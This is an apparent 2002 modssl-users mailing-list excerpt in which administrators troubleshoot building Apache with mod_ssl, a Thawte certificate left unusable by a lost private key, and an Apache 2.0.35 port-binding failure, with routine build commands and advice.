have tried 5-6 times to install > >> apache+mod_ssl-1.3.24+2.8.8 directly from ports that does all the work, > >> where I simply use "make install clean" but I'm getting the same (or > >> similar) error message, but don't have a clue as to how to do the > >> "re-compile". Could you please point me to the > >> "...the INSTALL document in the mod_ssl distro is quite good..." > >> that you refer to. I'm desparate to set up a secure server as time is of > >> the essence. Does "mod_ssl" install that document in the /usr/local/share/ > >> directory during the install. > >> > >> To be more specific, here is the error I get: > >> ============================================== > >> [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO libexec/apache/libphp4.so uses > >> plain Apache 1.3 API, this module might crash under EAPI! (please recompile > >> it with -DEAPI) > >> [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO > >> libexec/apache/mod_frontpage.so uses plain Apache 1.3 API, this module > >> might crash under EAPI! (please recompile it with -DEAPI) > >> ============================================== > > > >When you untar the mod_ssl distro it's right there in the top directory. > > > >Here are my notes from the last time I installed plain statically > >compiled apache+mod_ssl (this is version 1.3.14 - just change the > >numbers and the installation paths to suit your distro): > > > >Installing Apache 1.3.14 with mod_ssl and mm > >----------------------------------------------- > >(see http://www.modssl.org/example/) > > > >- Get the sources: > >- www.apache.org <-- apache_1.3.14.tar.gz > >- ftp://ftp.openssl.org <-- openssl-0.9.6.tar.gz > >- www.modssl.org <-- mod_ssl-2.7.1-1.3.14.tar.gz > >- www.engelschall.com/sw/mm/ <-- mm-1.1.3.tar.gz > > > >- Save all these in /home/obo/downloads/tar_files > > > ># cd /home/apache > ># gzip -d -c /home/obo/downloads/tar_files/apache_1.3.14.tar.gz | tar > >xvf - > ># gzip -d -c /home/obo/downloads/tar_files/openssl-0.9.6.tar.gz | tar > >xvf - > ># gzip -d -c /home/obo/downloads/tar_files/mod_ssl-2.7.1-1.3.14.tar.gz | > >tar xvf - > ># gzip -d -c /home/obo/downloads/tar_files/mm-1.1.3.tar.gz | tar xvf - > > > >- Need to add perl and ar to the path; > > > ># PERL=/usr/local/bin/perl > ># export PERL > ># PATH=$PATH:/usr/local/bin:/usr/ccs/bin > ># export PATH > > > >- first, compile MM > > > ># cd mm-1.1.3 > ># ./configure --prefix=/home/apache/mm > ># make > ># make test > ># make install > > > >- All the files are untarred, so we go to openssl-0.9.6 > > > ># cd ../openssl-0.9.6 > ># ./Configure solaris-sparcv9-gcc --prefix=/home/apache > ># make clean > ># make > > > >- Switch to the modd_ssl directory and configure it. > > > ># cd ../mod_ssl-2.7.1-1.3.14 > ># ./configure --with-apache=../apache_1.3.14 --with-ssl=../openssl-0.9.6 > >--prefix=/home/apache > > > >- Switch to the apache directory > > > ># cd ../apache_1.3.14 > ># SSL_BASE=../openssl-0.9.6 > ># export SSL_BASE > ># ./configure --enable-module=ssl --prefix=/home/apache > ># make > ># make install > >______________________________________________________________________ > >Apache Interface to OpenSSL (mod_ssl) www.modssl.org > >User Support Mailing List modssl-users@modssl.org > >Automated List Manager majordomo@modssl.org > > > > > > Many thanks, Owen for the details of your last install. But, on FBSD, if I > already have Apache-1.23+OpemSSL+other mods all set on a server, what would > be the same syntax details to just add the mod_ssl-2.8.7-1.3.23.tar.gz so > not to mess up the existing setup that has a number of vhosts already. > > Thanks for your patience with my questions.... > > > .... our website: http://www.sage-one.net/ > > Best regards, > > Jack L. Stone > Server Admin > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Apr 14 18:29:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA15592; Sun, 14 Apr 2002 18:28:15 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns1.microanswers.net id SAA15581; Sun, 14 Apr 2002 18:27:35 +0200 (MET DST) Received: from ws1 (microanswers.net [63.230.56.77] (may be forged)) by ns1.microanswers.net (8.11.0/8.11.0) with SMTP id g3EGCgR15042 for ; Sun, 14 Apr 2002 11:12:43 -0500 Message-ID: <017f01c1e3d1$0f986480$4d38e63f@microanswers.net> From: "Andrew Lietzow" To: References: <3.0.5.32.20020413103322.02e4f930@mail.sage-one.net> <3.0.5.32.20020413112001.02e4f930@mail.sage-one.net> Subject: Reinstalling a Thawte CRT - Feasible? Date: Sun, 14 Apr 2002 11:25:58 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew Lietzow" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear mod_ssl'ers, I have in my possesion a diskette on which I backed up my Thawte CRT file (at least I'm bright enough to have done that...but at the time I didn't know that I would need to have backed up TWO files... anyhow...). It has been successfully installed previously on a SuSE Linux 7.1 server. The box crashed hard last weekend (fortunately, it is was not quite yet a production server). I could not get that fairly old P-100 system to come back up. Everything I tried failed. Apparently, it took a hit on a memory chip or something critical to the system such that it could not be rebooted. I pulled hair for about a day while searching the SuSE site, and the entire Inet crash recover routines on a SuSE box. No magical answer appeared. I made the decision to upgrade. Now I have installed SuSE 7.3 on this new server and I need to reinstall my CERT. I have the securedomainname.crt file in my possession on a diskette but I do not have the original securedomainname.key file, or the securedomainname.csr file (because I trust servers to never crash?). The files are gone now as I have completely reformatted that system during the new install. I have gone through the steps at http://www.thawte.com/ucgi/gothawte.cgi?a=e380614470105000 to generate a new server.key and server.csr file. Since I am running Apache 2.0.35, I modified my /usr/local/apache2/conf/ssl.conf file to access the new .key and OLD .crt file. It appears to be work through the ssl.conf file just fine and then dies with a mismatch error. The entries I made look like this: SSLCertificateFile /usr/local/apache2/conf/ssl.crt/securedomainname.crt (the old file from Thawte, copied over from diskette) SSLCertificateKeyFile /usr/local/apache2/conf/ssl.key/securedomainname.key (a new file). Of course, perhaps critical to this routine is whether I answered the questions EXACTLY the same during the creation of the NEW securedomainname.csr file. It's possible, but I'm not 100% certain. When I attempt to fire up with: ./apachectl startssl the system prompts me for a passphrase and it accepts it. I did NOT enter a passphrase when I requested my original Thawte CERT. I don't know if this is critical (i.e. is my passphrase encrypted into the CSR file and they use this as part of the generation of my private.crt file?). Anyhow, when I ATTEMPT to fire up with ./apachectl startssl the system prompts with I enter the pass phrase, and it returns and then I get an "Unable to start httpd" error message. I checked the /logs/error_log file where there is a record of a grumble... . Rather than spend hours attempting to make new .key and .csr files, and then to "trick" the system into accepting my old.crt file, I need to ask the question whether this is even feasible. Was my original KEY file generated with a random seed routine that made it so that when I sent my CSR file to Thawte, I cannot ever create a KEY file on this server that would match to my old CRT? NOW that I see their caveat, "Now PLEASE backup your www.xxx.com.key and make a note of the passphrase. Losing your key will cost you money!" I imagine this is why this can't be done, but I have to pose the question, just to be sure. No use spending another 100 bucks if I don't have to. TIA, Baffled and UNCERTIFIED on CRT'S, I remain... Andrew Lietzow The ACL Group, Inc. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Apr 14 19:00:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA16667; Sun, 14 Apr 2002 18:59:13 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id SAA16663; Sun, 14 Apr 2002 18:59:01 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3EGveb09340 for ; Sun, 14 Apr 2002 12:57:40 -0400 Date: Sun, 14 Apr 2002 12:57:40 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: Reinstalling a Thawte CRT - Feasible? In-Reply-To: <017f01c1e3d1$0f986480$4d38e63f@microanswers.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sun, 14 Apr 2002, Andrew Lietzow wrote: > Now I have installed SuSE 7.3 on this new server and I need to reinstall my > CERT. I have the securedomainname.crt file in my possession on a diskette > but I do not have the original securedomainname.key file, or the > securedomainname.csr file (because I trust servers to never crash?). The > files are gone now as I have completely reformatted that system during the > new install. Sorry to be the one to have to tell you this, but you can't mix-and-match like that. The certificate is absolutely tied to the private key, because the certificate contains the public key. So you can't use the certificate/public key unless you have the private key that goes with it. I don't know if Thawte has a "replacement" program... I think some of the CA's do. So maybe you can get a reissued certificate to go with your new private key for less than the full price. Good luck, Cliff -------------------------------------------------------------- Cliff Woolley cliffwoolley@yahoo.com Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Apr 14 19:17:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA17600; Sun, 14 Apr 2002 19:16:07 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id TAA17563; Sun, 14 Apr 2002 19:15:14 +0200 (MET DST) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id NAA26492; Sun, 14 Apr 2002 13:20:46 -0400 Date: Sun, 14 Apr 2002 13:20:46 -0400 (EDT) From: "R. DuFresne" To: Andrew Lietzow cc: modssl-users@modssl.org Subject: Re: Reinstalling a Thawte CRT - Feasible? In-Reply-To: <017f01c1e3d1$0f986480$4d38e63f@microanswers.net> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users pull the drive and pop it into another machine so you can recover what ya need. Thanks, Ron DuFresne On Sun, 14 Apr 2002, Andrew Lietzow wrote: > Dear mod_ssl'ers, > I have in my possesion a diskette on which I backed up my Thawte CRT file > (at least I'm bright enough to have done that...but at the time I didn't > know that I would need to have backed up TWO files... anyhow...). It has > been successfully installed previously on a SuSE Linux 7.1 server. The box > crashed hard last weekend (fortunately, it is was not quite yet a production > server). I could not get that fairly old P-100 system to come back up. > Everything I tried failed. Apparently, it took a hit on a memory chip or > something critical to the system such that it could not be rebooted. I > pulled hair for about a day while searching the SuSE site, and the entire > Inet crash recover routines on a SuSE box. No magical answer appeared. I > made the decision to upgrade. > > Now I have installed SuSE 7.3 on this new server and I need to reinstall my > CERT. I have the securedomainname.crt file in my possession on a diskette > but I do not have the original securedomainname.key file, or the > securedomainname.csr file (because I trust servers to never crash?). The > files are gone now as I have completely reformatted that system during the > new install. > > I have gone through the steps at > http://www.thawte.com/ucgi/gothawte.cgi?a=e380614470105000 to generate a new > server.key and server.csr file. Since I am running Apache 2.0.35, I > modified my /usr/local/apache2/conf/ssl.conf file to access the new .key and > OLD .crt file. It appears to be work through the ssl.conf file just fine > and then dies with a mismatch error. > > The entries I made look like this: > SSLCertificateFile /usr/local/apache2/conf/ssl.crt/securedomainname.crt (the > old file from Thawte, copied over from diskette) > SSLCertificateKeyFile /usr/local/apache2/conf/ssl.key/securedomainname.key > (a new file). > > Of course, perhaps critical to this routine is whether I answered the > questions EXACTLY the same during the creation of the NEW > securedomainname.csr file. It's possible, but I'm not 100% certain. > > When I attempt to fire up with: > ./apachectl startssl > the system prompts me for a passphrase and it accepts it. I did NOT enter a > passphrase when I requested my original Thawte CERT. I don't know if this > is critical (i.e. is my passphrase encrypted into the CSR file and they use > this as part of the generation of my private.crt file?). Anyhow, when I > ATTEMPT to fire up with > > ./apachectl startssl > the system prompts with > > In order to read them, you have to provide us with the pass phrases. > securedomainname.com:443(RSA)> > > I enter the pass phrase, and it returns > > > > and then I get an "Unable to start httpd" error message. > > I checked the /logs/error_log file where there is a record of a grumble... > . > Rather than spend hours attempting to make new .key and .csr files, and then > to "trick" the system into accepting my old.crt file, I need to ask the > question whether this is even feasible. Was my original KEY file generated > with a random seed routine that made it so that when I sent my CSR file to > Thawte, I cannot ever create a KEY file on this server that would match to > my old CRT? > > NOW that I see their caveat, > "Now PLEASE backup your www.xxx.com.key and make a note of the passphrase. > Losing your key will cost you money!" I imagine this is why this can't be > done, but I have to pose the question, just to be sure. No use spending > another 100 bucks if I don't have to. TIA, > > Baffled and UNCERTIFIED on CRT'S, I remain... > > Andrew Lietzow > The ACL Group, Inc. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 08:06:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id IAA02207; Mon, 15 Apr 2002 08:05:10 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id IAA02045; Mon, 15 Apr 2002 08:04:31 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 99CD44CE742; Sun, 14 Apr 2002 21:50:57 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3EJndw20821; Sun, 14 Apr 2002 21:49:39 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from ulairi.csun.edu id TAA17454; Sun, 14 Apr 2002 19:12:19 +0200 (MET DST) From: ulairi@csun.edu Received: (qmail 25452 invoked by uid 60001); 14 Apr 2002 17:09:57 -0000 Received: from 68.66.191.245 ( [68.66.191.245]) as user ulairi@ulairi.csun.edu by ulairi.csun.edu with HTTP; Sun, 14 Apr 2002 10:09:57 +0700 Message-ID: <1018804197.3cb9b7e544698@ulairi.csun.edu> Date: Sun, 14 Apr 2002 10:09:57 +0700 To: modssl-users@modssl.org Subject: Re: Reinstalling a Thawte CRT - Feasible? References: <3.0.5.32.20020413103322.02e4f930@mail.sage-one.net> <3.0.5.32.20020413112001.02e4f930@mail.sage-one.net> <017f01c1e3d1$0f986480$4d38e63f@microanswers.net> In-Reply-To: <017f01c1e3d1$0f986480$4d38e63f@microanswers.net> MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 2.3.7-cvs Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: ulairi@csun.edu X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Unfortunately, you're out of luck. The .key file and .crt file are a related to each other much in the same way the SSH public/private key pairs are related. I do have a question and a recommendation: Q: Ok, the old server died, but was the hard-drive utterly non-functional? What prevents you from putting the HD into a functional Linux box, mounting it, and reading the old .key? R: I use OpenSSL to manage the CSRs and the keys for our production servers - on my UNIX workstation. (Yep, I back things up onto out DLT tape setups from that workstation). Floppies go bad too often. Hope this helps -ulairi@csun.edu ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 15:02:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA21996; Mon, 15 Apr 2002 15:01:19 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id PAA21975; Mon, 15 Apr 2002 15:00:31 +0200 (MET DST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 15 Apr 2002 05:59:25 -0700 Received: from 134.32.101.94 by lw7fd.law7.hotmail.msn.com with HTTP; Mon, 15 Apr 2002 12:59:25 GMT X-Originating-IP: [134.32.101.94] From: "paul priestman" To: modssl-users@modssl.org Subject: Apache 2.0.35 with SSL - wont start Date: Mon, 15 Apr 2002 12:59:25 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 15 Apr 2002 12:59:25.0586 (UTC) FILETIME=[5ED09F20:01C1E47D] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "paul priestman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello all, I have downloaded and installed Apache 2.0.35 with SSL. I have configured the httpd.conf as they suggest in ssl.conf. However, when i try to start apachectl i get the following message: (13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 no listening sockets available, shutting down ./apachectl startssl: httpd could not be started Has anyone any ideas what i'm doing wrong - i have succesfully got ssl working with apache 1.3.22. Thanks for your time Paul _________________________________________________________________ Chat with friends online, try MSN Messenger: http://messenger.msn.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 15:08:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA22529; Mon, 15 Apr 2002 15:07:05 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id PAA22525; Mon, 15 Apr 2002 15:06:58 +0200 (MET DST) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id JAA29942; Mon, 15 Apr 2002 09:12:42 -0400 Date: Mon, 15 Apr 2002 09:12:42 -0400 (EDT) From: "R. DuFresne" To: paul priestman cc: modssl-users@modssl.org Subject: Re: Apache 2.0.35 with SSL - wont start In-Reply-To: Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users You're not trying to run two httpd's on the same set of ports are you, the old one running while trying to fire up the new? that's what the error suggests I think... thanks, Ron DuFresne On Mon, 15 Apr 2002, paul priestman wrote: > Hello all, > > I have downloaded and installed Apache 2.0.35 with SSL. I have configured > the httpd.conf as they suggest in ssl.conf. However, when i try to start > apachectl i get the following message: > > (13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 > no listening sockets available, shutting down > ./apachectl startssl: httpd could not be started > > Has anyone any ideas what i'm doing wrong - i have succesfully got ssl > working with apache 1.3.22. > > Thanks for your time > > Paul > > _________________________________________________________________ > Chat with friends online, try MSN Messenger: http://messenger.msn.com > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 15:10:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA22621; Mon, 15 Apr 2002 15:09:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id PAA22565; Mon, 15 Apr 2002 15:08:07 +0200 (MET DST) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id PAA01291 for ; Mon, 15 Apr 2002 15:08:01 +0200 (MET DST) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma001285; Mon, 15 Apr 02 15:07:58 +0200 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id PAA13484 for ; Mon, 15 Apr 2002 15:07:57 +0200 (MET DST) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id PAA09839 for ; Mon, 15 Apr 2002 15:07:56 +0200 (MEST) Message-ID: <3CBAD0AC.9CE34D08@bourse.ch> Date: Mon, 15 Apr 2002 15:07:56 +0200 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Apache 2.0.35 with SSL - wont start References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users paul priestman wrote: > > Hello all, > > I have downloaded and installed Apache 2.0.35 with SSL. I have configured > the httpd.conf as they suggest in ssl.conf. However, when i try to start > apachectl i get the following message: > > (13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 > no listening sockets available, shutting down > ./apachectl startssl: httpd could not be started To bind to a port < 1024, you have to start apache as root. Are you doing this? Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 15:23:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA23153; Mon, 15 Apr 2002 15:22:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id PAA23126; Mon, 15 Apr 2002 15:21:08 +0200 (MET DST) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id JAA29996; Mon, 15 Apr 2002 09:26:37 -0400 Date: Mon, 15 Apr 2002 09:26:37 -0400 (EDT) From: "R. DuFresne" To: paul priestman cc: modssl-users@modssl.org Subject: Re: Apache 2.0.35 with SSL - wont start In-Reply-To: Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > > (13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 > > no listening sockets available, shutting down > > ./apachectl startssl: httpd could not be started > > It's *not* trying to start on 8443 though... thanks, Ron DuFresne On Mon, 15 Apr 2002, paul priestman wrote: > i'm actually trying to run this server on port 8443 - the other httpd runs > on port 443 but i have stopped this server running (as its just another test > server). I am starting the server as my self - not as root but the port is > > 1024 anyway > > I have tried chaning the port to other numbers aswell but to no luck.... > > Paul > > >From: "R. DuFresne" > >To: paul priestman > >CC: modssl-users@modssl.org > >Subject: Re: Apache 2.0.35 with SSL - wont start > >Date: Mon, 15 Apr 2002 09:12:42 -0400 (EDT) > > > > > >You're not trying to run two httpd's on the same set of ports are you, the > >old one running while trying to fire up the new? > > > >that's what the error suggests I think... > > > >thanks, > > > >Ron DuFresne > > > >On Mon, 15 Apr 2002, paul priestman wrote: > > > > > Hello all, > > > > > > I have downloaded and installed Apache 2.0.35 with SSL. I have > >configured > > > the httpd.conf as they suggest in ssl.conf. However, when i try to > >start > > > apachectl i get the following message: > > > > > > (13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 > > > no listening sockets available, shutting down > > > ./apachectl startssl: httpd could not be started > > > > > > Has anyone any ideas what i'm doing wrong - i have succesfully got ssl > > > working with apache 1.3.22. > > > > > > Thanks for your time > > > > > > Paul > > > > > > _________________________________________________________________ > > > Chat with friends online, try MSN Messenger: http://messenger.msn.com > > > > > > ______________________________________________________________________ > > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > > User Support Mailing List modssl-users@modssl.org > > > Automated List Manager majordomo@modssl.org > > > > > > >-- > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > admin & senior security consultant: sysinfo.com > > http://sysinfo.com > > > >"Cutting the space budget really restores my faith in humanity. It > >eliminates dreams, goals, and ideals and lets us get straight to the > >business of hate, debauchery, and self-annihilation." > > -- Johnny Hart > > > >testing, only testing, and damn good at it too! > > > > > > > _________________________________________________________________ > Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 15:29:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA23422; Mon, 15 Apr 2002 15:28:12 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from www.dicecorp.com id PAA23396; Mon, 15 Apr 2002 15:27:43 +0200 (MET DST) Received: from DRAGON (internal154.dicecorp.com [192.168.100.154]) by www.dicecorp.com (8.11.1/8.11.1) with ESMTP id g3FDRca23124 for ; Mon, 15 Apr 2002 09:27:38 -0400 From: "Jeremy Walton" To: Subject: RE: Apache 2.0.35 with SSL - wont start Date: Mon, 15 Apr 2002 09:27:48 -0400 Message-ID: <006701c1e481$55ddfc10$9a64a8c0@DRAGON> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal In-Reply-To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jeremy Walton" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users There is 2 reason for not being able to bind to a port. One, another process already has it open and is currently listen (netstat -a or under linux netstat -vatp). Two, you have to be root to bind to ports under 1024. Jeremy Walton DICE Corporation -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of R. DuFresne Sent: Monday, April 15, 2002 9:27 AM To: paul priestman Cc: modssl-users@modssl.org Subject: Re: Apache 2.0.35 with SSL - wont start > > (13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 > > no listening sockets available, shutting down > > ./apachectl startssl: httpd could not be started > > It's *not* trying to start on 8443 though... thanks, Ron DuFresne On Mon, 15 Apr 2002, paul priestman wrote: > i'm actually trying to run this server on port 8443 - the other httpd > runs > on port 443 but i have stopped this server running (as its just another test > server). I am starting the server as my self - not as root but the port is > > 1024 anyway > > I have tried chaning the port to other numbers aswell but to no > luck.... > > Paul > > >From: "R. DuFresne" > >To: paul priestman > >CC: modssl-users@modssl.org > >Subject: Re: Apache 2.0.35 with SSL - wont start > >Date: Mon, 15 Apr 2002 09:12:42 -0400 (EDT) > > > > > >You're not trying to run two httpd's on the same set of ports are > >you, the old one running while trying to fire up the new? > > > >that's what the error suggests I think... > > > >thanks, > > > >Ron DuFresne > > > >On Mon, 15 Apr 2002, paul priestman wrote: > > > > > Hello all, > > > > > > I have downloaded and installed Apache 2.0.35 with SSL. I have > >configured > > > the httpd.conf as they suggest in ssl.conf. However, when i try > > > to > >start > > > apachectl i get the following message: > > > > > > (13)Permission denied: make_sock: could not bind to address > > > 0.0.0.0:443 no listening sockets available, shutting down > > > ./apachectl startssl: httpd could not be started > > > > > > Has anyone any ideas what i'm doing wrong - i have succesfully got > > > ssl working with apache 1.3.22. > > > > > > Thanks for your time > > > > > > Paul > > > > > > _________________________________________________________________ > > > Chat with friends online, try MSN Messenger: > > > http://messenger.msn.com > > > > > > ______________________________________________________________________ > > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > > User Support Mailing List modssl-users@modssl.org > > > Automated List Manager majordomo@modssl.org > > > > > > >-- > 